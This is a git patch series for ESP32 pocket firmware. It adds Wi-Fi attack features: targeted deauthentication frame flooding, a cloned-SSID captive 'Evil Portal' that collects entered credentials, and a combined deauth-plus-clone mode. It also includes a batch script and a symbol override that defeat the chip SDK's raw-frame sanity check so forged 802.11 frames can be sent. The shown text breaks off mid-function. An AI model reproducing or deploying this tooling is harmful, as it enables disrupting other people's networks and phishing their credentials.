From ff0125c446dacb3ad62e0c90c0b4a19a1161c238 Mon Sep 17 00:00:00 2001 From: Pirata Date: Fri, 10 May 2024 17:25:44 -0300 Subject: [PATCH 1/2] deauth errors --- deauth_setup.bat | 5 +- src/TV-B-Gone.cpp | 230 +------------------------------------------- src/evil_portal.cpp | 36 ++++++- src/evil_portal.h | 2 +- src/globals.h | 1 - src/main.cpp | 3 +- src/wifi_atks.cpp | 213 ++++++++++++++++++++++++++++++++++++++++ src/wifi_atks.h | 34 +++++++ src/wifi_common.cpp | 6 -- 9 files changed, 288 insertions(+), 242 deletions(-) create mode 100644 src/wifi_atks.cpp create mode 100644 src/wifi_atks.h diff --git a/deauth_setup.bat b/deauth_setup.bat index 3f8dd516a..a18b90dc4 100644 --- a/deauth_setup.bat +++ b/deauth_setup.bat @@ -9,7 +9,7 @@ set "esp32_file2=%userprofile%\.platformio\packages\framework-arduinoespressif32 set "esp32s3_file2=%userprofile%\.platformio\packages\framework-arduinoespressif32\tools\sdk\esp32s3\lib\libnet80211_temp.a" rem Now execute objcopy commands (only if backups were created) -%userprofile%\.platformio\packages\toolchain-xtensa-esp32\xtensa-esp32-elf\bin\objcopy --weaken-symbol=ieee80211_raw_frame_sanity_check %esp32_file% %esp32_file2% +"%userprofile%"\.platformio\packages\toolchain-xtensa-esp32\xtensa-esp32-elf\bin\objcopy --weaken-symbol=ieee80211_raw_frame_sanity_check "%esp32_file%" "%esp32_file2%" rem Rename the original file to .old ren "%esp32_file%" "libnet80211.a.old" @@ -18,7 +18,7 @@ rem Rename the _temp to original ren "%esp32_file2%" "libnet80211.a" rem Now execute objcopy commands (only if backups were created) -%userprofile%\.platformio\packages\toolchain-xtensa-esp32s3\xtensa-esp32s3-elf\bin\objcopy --weaken-symbol=ieee80211_raw_frame_sanity_check %esp32s3_file% %esp32s3_file2% +"%userprofile%"\.platformio\packages\toolchain-xtensa-esp32s3\xtensa-esp32s3-elf\bin\objcopy --weaken-symbol=ieee80211_raw_frame_sanity_check "%esp32s3_file%" "%esp32s3_file2%" rem Rename the original file to .old ren "%esp32s3_file%" "libnet80211.a.old" @@ -26,4 +26,5 @@ ren "%esp32s3_file%" "libnet80211.a.old" rem Rename the _temp to original ren "%esp32s3_file2%" "libnet80211.a" +PAUSE diff --git a/src/TV-B-Gone.cpp b/src/TV-B-Gone.cpp index 9257aa8c1..cb1f98b33 100644 --- a/src/TV-B-Gone.cpp +++ b/src/TV-B-Gone.cpp @@ -1,48 +1,7 @@ /* Last Updated: 30 Mar. 2018 By Anton Grimpelhuber (anton.grimpelhuber@gmail.com) - ------------------------------------------------------------ -Semver (http://semver.org/) VERSION HISTORY (newest on top): -(date format: yyyymmdd; ex: 20161022 is 22 Oct. 2016) ------------------------------------------------------------- - - 20180330 - v1.4 - First port to ESP8266 (tested: wemos D1 mini) by Anton Grimpelhuber - - 20161022 - v1.3 - Semver versioning implemented; various code updates, clarifications, & comment additions, and changes to fix incompatibilities so it will now compile with latest versions of gcc compiler; also improved blink indicator routines & added the ability to stop the code-sending sequence once it has begun; by Gabriel Staples (http://www.ElectricRCAircraftGuy.com) - - 20101023 - v1.2 - Latest version posted by Ken Shirriff on his website here (http://www.righto.com/2010/11/improved-arduino-tv-b-gone.html) (direct download link here: http://arcfn.com/files/arduino-tv-b-gone-1.2.zip) - - 20101018 - v1.2 - Universality for EU (European Union) & NA (North America) added by Mitch Altman; sleep mode added by ka1kjz - - 2010____ - v1.2 - code ported to Arduino; by Ken Shirriff - - 20090816 - v1.2 - for ATtiny85v, by Mitch Altman & Limor Fried (https://www.adafruit.com/), w/some code by Kevin Timmerman & Damien Good - -TV-B-Gone for Arduino version 1.2, Oct 23 2010 -Ported to Arduino by Ken Shirriff -See here: http://www.arcfn.com/2009/12/tv-b-gone-for-arduino.html and here: http://www.righto.com/2010/11/improved-arduino-tv-b-gone.html (newer) - -I added universality for EU (European Union) or NA (North America), -and Sleep mode to Ken's Arduino port - -- Mitch Altman 18-Oct-2010 -Thanks to ka1kjz for the code for Sleep - - -The original code is: -TV-B-Gone Firmware version 1.2 - for use with ATtiny85v and v1.2 hardware - (c) Mitch Altman + Limor Fried 2009 - Last edits, August 16 2009 - -With some code from: -Kevin Timmerman & Damien Good 7-Dec-07 ------------------------------------------------------------- -CIRCUIT: ------------------------------------------------------------- --NB: SEE "main.h" TO VERIFY DEFINED PINS TO USE -The hardware for this project uses a wemos D1 mini ESP8266-based board: - Connect an IR LED to pin 14 / D5 (IRLED). - Uses the built-in LED via pin 2. - Connect a push-button between pin 12 / D6 (TRIGGER) and ground. - Pin 5 / D1 (REGIONSWITCH) must be left floating for North America, or wire it to ground to have it output European codes. - -More about the wiring is written in the readme. ------------------------------------------------------------ LICENSE: ------------------------------------------------------------ @@ -59,12 +18,6 @@ Distributed under Creative Commons 2.5 -- Attribution & Share Alike uint8_t read_bits(uint8_t count); uint16_t rawData[300]; - -#define putstring_nl(s) Serial.println(s) -#define putstring(s) Serial.print(s) -#define putnum_ud(n) Serial.print(n, DEC) -#define putnum_uh(n) Serial.print(n, HEX) - #define IR_DATA_BUFFER_SIZE 300 File databaseFile; @@ -81,44 +34,8 @@ uint8_t num_EUcodes = NUM_ELEM(EUpowerCodes); uint16_t ontime, offtime; uint8_t i,num_codes; uint8_t region; -/* -This project transmits a bunch of TV POWER codes, one right after the other, - with a pause in between each. (To have a visible indication that it is - transmitting, it also pulses a visible LED once each time a POWER code is - transmitted.) That is all TV-B-Gone does. The tricky part of TV-B-Gone - was collecting all of the POWER codes, and getting rid of the duplicates and - near-duplicates (because if there is a duplicate, then one POWER code will - turn a TV off, and the duplicate will turn it on again (which we certainly - do not want). I have compiled the most popular codes with the - duplicates eliminated, both for North America (which is the same as Asia, as - far as POWER codes are concerned -- even though much of Asia USES PAL video) - and for Europe (which works for Australia, New Zealand, the Middle East, and - other parts of the world that use PAL video). - - Before creating a TV-B-Gone Kit, I originally started this project by hacking - the MiniPOV kit. This presents a limitation, based on the size of - the Atmel ATtiny2313 internal flash memory, which is 2KB. With 2KB we can only - fit about 7 POWER codes into the firmware's database of POWER codes. However, - the more codes the better! Which is why we chose the ATtiny85 for the - TV-B-Gone Kit. - - This version of the firmware has the most popular 100+ POWER codes for - North America and 100+ POWER codes for Europe. You can select which region - to use by soldering a 10K pulldown resistor. - */ -/* -This project is a good example of how to use the AVR chip timers. - */ - -/* This is kind of a strange but very useful helper function - Because we are using compression, we index to the timer table - not with a full 8-bit byte (which is wasteful) but 2 or 3 bits. - Once code_ptr is set up to point to the right part of memory, - this function will let us read 'count' bits at a time which - it does by reading a byte into 'bits_r' and then buffering it. */ - // we cant read more than 8 bits at a time so dont try! uint8_t read_bits(uint8_t count) { @@ -127,68 +44,22 @@ uint8_t read_bits(uint8_t count) // we need to read back count bytes for (i=0; icodes[code_ptr++]; - DEBUGP(putstring("\n\rGet byte: "); - putnum_uh(bits_r); - ); - // and reset the buffer size (8 bites in a byte) bitsleft_r = 8; } - // remove one bit bitsleft_r--; - // and shift it off of the end of 'bits_r' tmp |= (((bits_r >> (bitsleft_r)) & 1) << (count-1-i)); } - // return the selected bits in the LSB part of tmp return tmp; } - -/* Legacy explanation from old Arduino Code for reference -The C compiler creates code that will transfer all constants into RAM when - the microcontroller resets. Since this firmware has a table (powerCodes) - that is too large to transfer into RAM, the C compiler needs to be told to - keep it in program memory space. This is accomplished by the macro - (this is used in the definition for powerCodes). Since the C compiler assumes - that constants are in RAM, rather than in program memory, when accessing - powerCodes, we need to use the pgm_read_word() and pgm_read_byte macros, and - we need to use powerCodes as an address. This is done with PGM_P, defined - below. - For example, when we start a new powerCode, we first point to it with the - following statement: - PGM_P thecode_p = pgm_read_word(powerCodes+i); - The next read from the powerCode is a byte that indicates the carrier - frequency, read as follows: - const uint8_t freq = pgm_read_byte(code_ptr++); - After that is a byte that tells us how many 'onTime/offTime' pairs we have: - const uint8_t numpairs = pgm_read_byte(code_ptr++); - The next byte tells us the compression method. Since we are going to use a - timing table to keep track of how to pulse the LED, and the tables are - pretty short (usually only 4-8 entries), we can index into the table with only - 2 to 4 bits. Once we know the bit-packing-size we can decode the pairs - const uint8_t bitcompression = pgm_read_byte(code_ptr++); - Subsequent reads from the powerCode are n bits (same as the packing size) - that index into another table in ROM that actually stores the on/off times - const PGM_P time_ptr = (PGM_P)pgm_read_word(code_ptr); - */ - void chooseRegion(int reg) { region = reg; - if (reg) { - DEBUGP(putstring_nl("NA")); - num_codes=num_NAcodes; - } - else { - num_codes=num_EUcodes; - DEBUGP(putstring_nl("EU")); - } + if (reg) num_codes=num_NAcodes; + else num_codes=num_EUcodes; } - - void StartTvBGone() { Serial.begin(115200); @@ -209,112 +80,42 @@ void StartTvBGone() loopOptions(options); delay(200); - // Debug output: indicate how big our database is - if (region) { - DEBUGP(putstring("\n\rNA Codesize: "); - putnum_ud(num_NAcodes); - ); - } else { - DEBUGP(putstring("\n\rEU Codesize: "); - putnum_ud(num_EUcodes); - ); - } -/* - // Tell the user what region we're in - 3 flashes is NA, 6 is EU - if (region == NA) - quickflashLEDx(3); - else //region == EU - quickflashLEDx(6); -*/ sendAllCodes(); } void sendAllCodes() { bool endingEarly = false; //will be set to true if the user presses the button during code-sending - - // for every POWER code in our collection checkSelPress(); for (i=0 ; itimer_val; - // set OCR for Timer1 to output this POWER code's carrier frequency - - // Print out the frequency of the carrier and the PWM settings - DEBUGP(putstring("\n\rFrequency: "); - putnum_ud(freq); - ); - - DEBUGP(uint16_t x = (freq+1) * 2; - putstring("\n\rFreq: "); - putnum_ud(F_CPU/x); - ); - - // Get the number of pairs, the second byte from the code struct const uint8_t numpairs = powerCode->numpairs; - DEBUGP(putstring("\n\rOn/off pairs: "); - putnum_ud(numpairs)); - - // Get the number of bits we use to index into the timer table - // This is the third byte of the structure const uint8_t bitcompression = powerCode->bitcompression; - DEBUGP(putstring("\n\rCompression: "); - putnum_ud(bitcompression); - putstring("\n\r")); // For EACH pair in this code.... code_ptr = 0; for (uint8_t k=0; ktimes[ti]; // read word 1 - ontime offtime = powerCode->times[ti+1]; // read word 2 - offtime - DEBUGP(putstring("\n\rti = "); - putnum_ud(ti>>1); - putstring("\tPair = "); - putnum_ud(ontime)); - DEBUGP(putstring("\t"); - putnum_ud(offtime)); - rawData[k*2] = ontime * 10; rawData[(k*2)+1] = offtime * 10; yield(); } progressHandler(i, num_codes); - // Send Code with library irsend.sendRaw(rawData, (numpairs*2) , freq); - Serial.print("\n"); yield(); - //Flush remaining bits, so that next code starts - //with a fresh set of 8 bits. bitsleft_r=0; - // visible indication that a code has been output. quickflashLED(); - // delay 205 milliseconds before transmitting next POWER code delay_ten_us(20500); @@ -352,7 +153,6 @@ void sendAllCodes() //pause for ~1.3 sec, then flash the visible LED 8 times to indicate that we're done delay_ten_us(MAX_WAIT_TIME); // wait 655.350ms delay_ten_us(MAX_WAIT_TIME); // wait 655.350ms - //quickflashLEDx(8); } else { displayRedStripe("User Stoped"); } @@ -364,14 +164,6 @@ void sendAllCodes() /****************************** LED AND DELAY FUNCTIONS ********/ - -// This function delays the specified number of 10 microseconds -// it is 'hardcoded' and is calibrated by adjusting DELAY_CNT -// in main.h Unless you are changing the crystal from 8MHz, dont -// mess with this. -//-due to uint16_t datatype, max delay is 65535 tens of microseconds, or 655350 us, or 655.350 ms. -//-NB: DELAY_CNT has been increased in main.h from 11 to 25 (last I checked) in order to allow this function -// to work properly with 16MHz Arduinos now (instead of 8MHz). void delay_ten_us(uint16_t us) { uint8_t timer; while (us != 0) { @@ -395,20 +187,6 @@ void quickflashLED( void ) { digitalWrite(LED, LED_OFF); } -// This function just flashes the visible LED a couple times, used to -// tell the user what region is selected -void quickflashLEDx( uint8_t x ) { - quickflashLED(); - while(--x) { - delay_ten_us(25000); // 250 ms OFF-time delay between flashes - quickflashLED(); - } -} - - - - - ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Custom IR diff --git a/src/evil_portal.cpp b/src/evil_portal.cpp index 34603f938..1877b0ffd 100644 --- a/src/evil_portal.cpp +++ b/src/evil_portal.cpp @@ -3,6 +3,7 @@ #include "mykeyboard.h" #include "wifi_common.h" #include "sd_functions.h" +#include "wifi_atks.h" AsyncWebServer *ep; // initialise webserver DNSServer dnsServer; @@ -54,7 +55,7 @@ class CaptiveRequestHandler : public AsyncWebHandler { } }; -void startEvilPortal() { +void startEvilPortal(String tssid, uint8_t* bssid, uint8_t channel, bool deauth) { bool redraw=true; Serial.begin(115200); // Definição da matriz "Options" @@ -66,7 +67,14 @@ void startEvilPortal() { loopOptions(options); while(checkNextPress()){ yield(); } // debounce - AP_name = keyboard("Free Wifi", 30, "Evil Portal SSID:"); + // tssid="" means that are opening a virgin Evil Portal + if (tssid=="") AP_name = keyboard("Free Wifi", 30, "Evil Portal SSID:"); + else { // tssid != "" means that is was cloned and can deploy Deauth + memcpy(ap_record.bssid, bssid, 6); + wsl_bypasser_send_raw_frame(&ap_record,channel); + AP_name = tssid; + } + while(checkNextPress()){ yield(); } // debounce IPAddress AP_GATEWAY(172, 0, 0, 1); @@ -117,8 +125,8 @@ void startEvilPortal() { drawMainMenu(0); menu_op.deleteSprite(); menu_op.createSprite(WIDTH-20, HEIGHT-35); - - while(!checkSelPress()) { + bool hold_deauth = false; + while(1) { if(totalCapturedCredentials!=previousTotalCapturedCredentials) { redraw=true; previousTotalCapturedCredentials = totalCapturedCredentials; @@ -139,13 +147,31 @@ void startEvilPortal() { menu_op.setTextSize(FP); menu_op.println(last_cred); + if (hold_deauth) { + menu_op.setTextSize(FP); + menu_op.setTextColor(BGCOLOR); + menu_op.drawRightString("Deauth OFF", menu_op.width(),menu_op.height()-8,SMOOTH_FONT); + } else { + menu_op.setTextSize(FP); + menu_op.setTextColor(TFT_RED); + menu_op.drawRightString("Deauth ON", menu_op.width(),menu_op.height()-8,SMOOTH_FONT); + } + menu_op.pushSprite(8,26); redraw=false; } + + if(!hold_deauth) wsl_bypasser_send_raw_frame(deauth_frame, 26); // sends deauth frames if needed. + + if(checkSelPress() && deauth) { + while(checkSelPress()) { yield(); } // timerless debounce + !hold_deauth; + } + dnsServer.processNextRequest(); } - while(checkSelPress()) { } + while(checkSelPress()) { yield(); } // timerless debounce displayWarning("Bruce will restart"); while(!checkSelPress()) { } // Evil Portal uses a lot of RAM memmory, and can't open Menus after that, need to restart. diff --git a/src/evil_portal.h b/src/evil_portal.h index 2e2869843..bb105d824 100644 --- a/src/evil_portal.h +++ b/src/evil_portal.h @@ -8,7 +8,7 @@ // function defaults -void startEvilPortal(); +void startEvilPortal(String tssid = "", uint8_t* bssid = nullptr, uint8_t channel = 1, bool deauth = false); void chooseHtml(bool def = true); diff --git a/src/globals.h b/src/globals.h index c0db7400a..cc6cb0ba4 100644 --- a/src/globals.h +++ b/src/globals.h @@ -52,4 +52,3 @@ extern bool returnToMenu; // variável para verificação e quebrar os loops void backToMenu(); - diff --git a/src/main.cpp b/src/main.cpp index 26056a775..b519cd2d5 100644 --- a/src/main.cpp +++ b/src/main.cpp @@ -48,6 +48,7 @@ TFT_eSprite draw = TFT_eSprite(&tft); #include "clients.h" #include "arp.h" #include "rf.h" +#include "wifi_atks.h" #ifdef CARDPUTER @@ -171,7 +172,7 @@ void loop() { {"Disconnect Wifi", [=]() { wifiDisconnect(); }}, //wifi_common.h }; } - options.push_back({"Wifi Atks", [=]() { displayRedStripe("Wifi Atks"); }}); + options.push_back({"Wifi Atks", [=]() { wifi_atk_menu(); }}); options.push_back({"TelNET", [=]() { telnet_setup(); }}); options.push_back({"SSH", [=]() { ssh_setup(); }}); options.push_back({"Raw Sniffer", [=]() { sniffer_setup(); }}); diff --git a/src/wifi_atks.cpp b/src/wifi_atks.cpp new file mode 100644 index 000000000..1ea148991 --- /dev/null +++ b/src/wifi_atks.cpp @@ -0,0 +1,213 @@ +// Borrowed from https://github.com/justcallmekoko/ESP32Marauder/ +// Learned from https://github.com/risinek/esp32-wifi-penetration-tool/ +// Arduino IDE needs to be tweeked to work, follow the instructions: https://github.com/justcallmekoko/ESP32Marauder/wiki/arduino-ide-setup +// But change the file in: C:\Users\\AppData\Local\Arduino15\packages\m5stack\hardware\esp32\2.0.9 +#include +#include "globals.h" +#include "wifi_atks.h" +#include "esp_wifi.h" +#include "esp_system.h" +#include "display.h" +#include "mykeyboard.h" +#include "evil_portal.h" + + +/** + * @brief Decomplied function that overrides original one at compilation time. + * + * @attention This function is not meant to be called! + * @see Project with original idea/implementation https://github.com/GANESH-ICMC/esp32-deauther +*/ +extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3){ + if (arg == 31337) + return 1; + else + return 0; +} + + +// Default Drauth Frame +const uint8_t deauth_frame_default[] = { + 0xc0, 0x00, 0x3a, 0x01, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0xf0, 0xff, 0x02, 0x00 +}; + +uint8_t deauth_frame[sizeof(deauth_frame_default)]; // 26 = [sizeof(deauth_frame_default[])] + +wifi_ap_record_t ap_record; + + +/*************************************************************************************** +** Function: send_raw_frame +** @brief: Broadcasts deauth frames +***************************************************************************************/ +void wsl_bypasser_send_raw_frame(const uint8_t *frame_buffer, int size){ + Serial.begin(115200); + ESP_ERROR_CHECK(esp_wifi_80211_tx(WIFI_IF_AP, frame_buffer, sizeof(&frame_buffer), false)); + Serial.println(" -> Sent deauth frame"); +} + + +/*************************************************************************************** +** function: wsl_bypasser_send_raw_frame +** @brief: prepare the frame to deploy the attack +***************************************************************************************/ +void wsl_bypasser_send_raw_frame(const wifi_ap_record_t *ap_record, uint8_t chan){ + Serial.begin(115200); + Serial.print("\nPreparing deauth frame to -> "); + for (int j = 0; j < 6; j++) { + Serial.print(ap_record->bssid[j], HEX); + if (j < 5) Serial.print(":"); + } + esp_wifi_set_channel(chan, WIFI_SECOND_CHAN_NONE); + delay(50); + memcpy(&deauth_frame[10], ap_record->bssid, 6); + memcpy(&deauth_frame[16], ap_record->bssid, 6); +} + + +/*************************************************************************************** +** function: wifi_atk_info +** @brief: Open Wifi information screen +***************************************************************************************/ +void wifi_atk_info(uint8_t* bssid, String tssid,String mac, uint8_t channel) { + //desenhar a tela + menu_op.deleteSprite(); + menu_op.createSprite(WIDTH-20, HEIGHT-35); + menu_op.fillRect(0,0, menu_op.width(),menu_op.height(), BGCOLOR); + menu_op.setTextColor(FGCOLOR); + menu_op.drawCentreString("-=Information=-", menu_op.width()/2,2,SMOOTH_FONT); + menu_op.drawString("AP: " + tssid,0,20); + menu_op.drawString("Channel: " + String(channel),0,38); + menu_op.drawString(mac,0,55); + menu_op.drawString("Press " + String(BTN_ALIAS) + " to act",0,menu_op.height()-20); + menu_op.pushSprite(6,26); + menu_op.deleteSprite(); + + delay(300); + while(!checkSelPress()) { + while(!checkSelPress()) { yield(); } // timerless debounce + target_atk_menu(bssid, tssid, mac, channel); + returnToMenu=true; + break; + } + +} + + +/*************************************************************************************** +** function: target_atk_menu +** @brief: Open menu to choose which AP Attack +***************************************************************************************/ +void wifi_atk_menu() { + int nets; + WiFi.mode(WIFI_MODE_STA); + displayScanning(); + nets=WiFi.scanNetworks(); + options = { }; + for(int i=0; i(WiFi.encryptionType(i))); }}); + } + options.push_back({"Main Menu", [=]() { backToMenu(); }}); + + delay(200); + loopOptions(options); + delay(200); +} +/*************************************************************************************** +** function: target_atk_menu +** @brief: Open menu to choose which AP Attack +***************************************************************************************/ +void target_atk_menu(uint8_t* bssid, String tssid,String mac, uint8_t channel) { + options = { + {"Deauth", [=]() { target_atk(bssid, tssid, mac, channel); }}, + {"Clone Portal", [=]() { startEvilPortal(tssid, bssid, channel,false); }}, + {"Deauth+Clone", [=]() { startEvilPortal(tssid, bssid, channel,true); }}, + {"Main Menu", [=]() { backToMenu(); }}, + }; + + delay(200); + loopOptions(options); + delay(200); +} + + +/*************************************************************************************** +** function: target_atk +** @brief: Deploy Target deauth +***************************************************************************************/ +void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel) { + Serial.begin(115200); + //criar o frame + memcpy(ap_record.bssid, bssid, 6); + WiFi.mode(WIFI_AP); + WiFi.softAP(tssid, emptyString, channel, 1, 4, false); + wifiConnected=true; + wsl_bypasser_send_raw_frame(&ap_record,channel); + + //loop com o ataque mostrando o numero de frames por segundo + int tmp = 0; + int count = 0; + tmp=millis(); + bool redraw = true; + delay(200); + checkSelPress(); + while(1) { + if(redraw) { + //desenhar a tela + menu_op.deleteSprite(); + menu_op.createSprite(WIDTH-20, HEIGHT-35); + menu_op.fillRect(0,0, menu_op.width(),menu_op.height(), BGCOLOR); + menu_op.setTextColor(TFT_RED); + menu_op.drawCentreString("Target Deauth", menu_op.width()/2,2,SMOOTH_FONT); + menu_op.setTextColor(FGCOLOR); + menu_op.drawString("AP: " + tssid,0,20); + menu_op.drawString("Channel: " + String(channel),0,38); + menu_op.drawString(mac,0,55); + menu_op.pushSprite(6,26); + redraw=false; + } + //Send frame + wsl_bypasser_send_raw_frame(deauth_frame, sizeof(deauth_frame_default)); + count++; + // atualize counter + if(millis()-tmp>1000) { + menu_op.setCursor(0,menu_op.height()-17); + menu_op.fillRect(0,menu_op.height()-17, menu_op.width(),17, BGCOLOR); + menu_op.print("Frames: " + String(count) + "/s"); + menu_op.pushSprite(6,26); + count=0; + tmp=millis(); + } + //Pause attack + if(checkSelPress()) { + displayRedStripe("Deauth Paused",TFT_WHITE,FGCOLOR); + while(checkSelPress()) { yield(); } // timeless debounce + // wait to restart or kick out of the function + while(!checkSelPress()) { + #ifndef CARDPUTER + if(checkPrevPress()) break; // Apertar o botão power dos sticks + #else + Keyboard.update(); + if(Keyboard.isKeyPressed('`')) break; // Apertar o ESC do cardputer + #endif + } + while(checkSelPress()) { yield(); } // timeless debounce + } + // Checks para sair do while + #ifndef CARDPUTER + if(checkPrevPress()) break; // Apertar o botão power dos sticks + #else + Keyboard.update(); + if(Keyboard.isKeyPressed('`')) break; // Apertar o ESC do cardputer + #endif + } + returnToMenu=true; +} + + + + diff --git a/src/wifi_atks.h b/src/wifi_atks.h new file mode 100644 index 000000000..adabf6440 --- /dev/null +++ b/src/wifi_atks.h @@ -0,0 +1,34 @@ +#include + +extern wifi_ap_record_t ap_record; +// Default Drauth Frame +extern const uint8_t deauth_frame_default[]; + +extern uint8_t deauth_frame[]; // 26 = [sizeof(deauth_frame_default[])] + +/** + * @brief Sends frame in frame_buffer using esp_wifi_80211_tx but bypasses blocking mechanism + * + * @param frame_buffer + * @param size size of frame buffer + */ +void wsl_bypasser_send_raw_frame(const uint8_t *frame_buffer, int size); + +/** + * @brief Sends deauthentication frame with forged source AP from given ap_record + * + * This will send deauthentication frame acting as frame from given AP, and destination will be broadcast + * MAC address - \c ff:ff:ff:ff:ff:ff + * + * @param ap_record AP record with valid AP information + * @param chan Channel of the targetted AP + */ +void wsl_bypasser_send_raw_frame(const wifi_ap_record_t *ap_record, uint8_t chan); + +void wifi_atk_info(uint8_t* bssid, String tssid,String mac, uint8_t channel); + +void wifi_atk_menu(); + +void target_atk_menu(uint8_t* bssid, String tssid,String mac, uint8_t channel); + +void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel); \ No newline at end of file diff --git a/src/wifi_common.cpp b/src/wifi_common.cpp index 70b81a448..fceb3cf4f 100644 --- a/src/wifi_common.cpp +++ b/src/wifi_common.cpp @@ -97,9 +97,3 @@ void wifiConnectMenu(bool isAP) { } -extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3){ - if (arg == 31337) - return 1; - else - return 0; -} \ No newline at end of file From 67fbe3c4aa3dade800df53656293808edc1f4e6b Mon Sep 17 00:00:00 2001 From: Pirata <104320209+bmorcelli@users.noreply.github.com> Date: Fri, 10 May 2024 23:57:39 -0300 Subject: [PATCH 2/2] Deauth a, Deauth+Clone deauth working at 200 fps in normal mode and 100fps in clone mode --- src/evil_portal.cpp | 27 ++++++++++++++++++----- src/evil_portal.h | 2 +- src/wifi_atks.cpp | 53 ++++++++++++++++++++++++++++++--------------- src/wifi_atks.h | 6 ++--- 4 files changed, 61 insertions(+), 27 deletions(-) diff --git a/src/evil_portal.cpp b/src/evil_portal.cpp index 1877b0ffd..85520ec95 100644 --- a/src/evil_portal.cpp +++ b/src/evil_portal.cpp @@ -14,6 +14,14 @@ int totalCapturedCredentials = 0; int previousTotalCapturedCredentials = -1; // stupid hack but wtfe String capturedCredentialsHtml = ""; +// Default Drauth Frame +const uint8_t deauth_frame_default2[] = { + 0xc0, 0x00, 0x3a, 0x01, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0xf0, 0xff, 0x02, 0x00 +}; class CaptiveRequestHandler : public AsyncWebHandler { public: @@ -55,7 +63,7 @@ class CaptiveRequestHandler : public AsyncWebHandler { } }; -void startEvilPortal(String tssid, uint8_t* bssid, uint8_t channel, bool deauth) { +void startEvilPortal(String tssid, uint8_t channel, bool deauth) { bool redraw=true; Serial.begin(115200); // Definição da matriz "Options" @@ -70,7 +78,8 @@ void startEvilPortal(String tssid, uint8_t* bssid, uint8_t channel, bool deauth) // tssid="" means that are opening a virgin Evil Portal if (tssid=="") AP_name = keyboard("Free Wifi", 30, "Evil Portal SSID:"); else { // tssid != "" means that is was cloned and can deploy Deauth - memcpy(ap_record.bssid, bssid, 6); + //memcpy(ap_record.bssid, bssid, 6); + memcpy(deauth_frame, deauth_frame_default2, sizeof(deauth_frame_default2)); wsl_bypasser_send_raw_frame(&ap_record,channel); AP_name = tssid; } @@ -122,10 +131,12 @@ void startEvilPortal(String tssid, uint8_t* bssid, uint8_t channel, bool deauth) ep->begin(); tft.fillRect(6, 27, WIDTH-12, HEIGHT-33, BGCOLOR); - drawMainMenu(0); + drawMainMenu(); menu_op.deleteSprite(); menu_op.createSprite(WIDTH-20, HEIGHT-35); bool hold_deauth = false; + int tmp=millis(); // one deauth frame each 30ms at least + checkSelPress(); while(1) { if(totalCapturedCredentials!=previousTotalCapturedCredentials) { redraw=true; @@ -161,11 +172,15 @@ void startEvilPortal(String tssid, uint8_t* bssid, uint8_t channel, bool deauth) redraw=false; } - if(!hold_deauth) wsl_bypasser_send_raw_frame(deauth_frame, 26); // sends deauth frames if needed. + if(!hold_deauth && (millis()-tmp) >20) { + wsl_bypasser_send_raw_frame(deauth_frame, 26); // sends deauth frames if needed. + tmp=millis(); + } if(checkSelPress() && deauth) { - while(checkSelPress()) { yield(); } // timerless debounce - !hold_deauth; + while(checkSelPress()) { delay(80); } // timerless debounce + hold_deauth = !hold_deauth; + redraw=true; } dnsServer.processNextRequest(); diff --git a/src/evil_portal.h b/src/evil_portal.h index bb105d824..6c45936e9 100644 --- a/src/evil_portal.h +++ b/src/evil_portal.h @@ -8,7 +8,7 @@ // function defaults -void startEvilPortal(String tssid = "", uint8_t* bssid = nullptr, uint8_t channel = 1, bool deauth = false); +void startEvilPortal(String tssid = "", uint8_t channel = 1, bool deauth = false); void chooseHtml(bool def = true); diff --git a/src/wifi_atks.cpp b/src/wifi_atks.cpp index 1ea148991..599c06ca8 100644 --- a/src/wifi_atks.cpp +++ b/src/wifi_atks.cpp @@ -10,6 +10,7 @@ #include "display.h" #include "mykeyboard.h" #include "evil_portal.h" +#include "wifi_common.h" /** @@ -45,9 +46,10 @@ wifi_ap_record_t ap_record; ** @brief: Broadcasts deauth frames ***************************************************************************************/ void wsl_bypasser_send_raw_frame(const uint8_t *frame_buffer, int size){ - Serial.begin(115200); - ESP_ERROR_CHECK(esp_wifi_80211_tx(WIFI_IF_AP, frame_buffer, sizeof(&frame_buffer), false)); - Serial.println(" -> Sent deauth frame"); + //Serial.begin(115200); + ESP_ERROR_CHECK(esp_wifi_80211_tx(WIFI_IF_AP, frame_buffer, size, false)); + //Serial.println(" -> Sent deauth frame"); + delay(5); } @@ -73,8 +75,9 @@ void wsl_bypasser_send_raw_frame(const wifi_ap_record_t *ap_record, uint8_t chan ** function: wifi_atk_info ** @brief: Open Wifi information screen ***************************************************************************************/ -void wifi_atk_info(uint8_t* bssid, String tssid,String mac, uint8_t channel) { +void wifi_atk_info(String tssid,String mac, uint8_t channel) { //desenhar a tela + drawMainMenu(); menu_op.deleteSprite(); menu_op.createSprite(WIDTH-20, HEIGHT-35); menu_op.fillRect(0,0, menu_op.width(),menu_op.height(), BGCOLOR); @@ -90,7 +93,7 @@ void wifi_atk_info(uint8_t* bssid, String tssid,String mac, uint8_t channel) { delay(300); while(!checkSelPress()) { while(!checkSelPress()) { yield(); } // timerless debounce - target_atk_menu(bssid, tssid, mac, channel); + target_atk_menu(tssid, mac, channel); returnToMenu=true; break; } @@ -109,8 +112,12 @@ void wifi_atk_menu() { nets=WiFi.scanNetworks(); options = { }; for(int i=0; i(WiFi.encryptionType(i))); }}); + //criar o frame + memcpy(ap_record.bssid, WiFi.BSSID(i), 6); + uint8_t chan = static_cast(WiFi.channel(i)); + options.push_back({WiFi.SSID(i).c_str(), [=]() { target_atk_menu(WiFi.SSID(i).c_str(), WiFi.BSSIDstr(i), chan); }}); } + options.push_back({"Main Menu", [=]() { backToMenu(); }}); delay(200); @@ -121,11 +128,12 @@ void wifi_atk_menu() { ** function: target_atk_menu ** @brief: Open menu to choose which AP Attack ***************************************************************************************/ -void target_atk_menu(uint8_t* bssid, String tssid,String mac, uint8_t channel) { +void target_atk_menu(String tssid,String mac, uint8_t channel) { options = { - {"Deauth", [=]() { target_atk(bssid, tssid, mac, 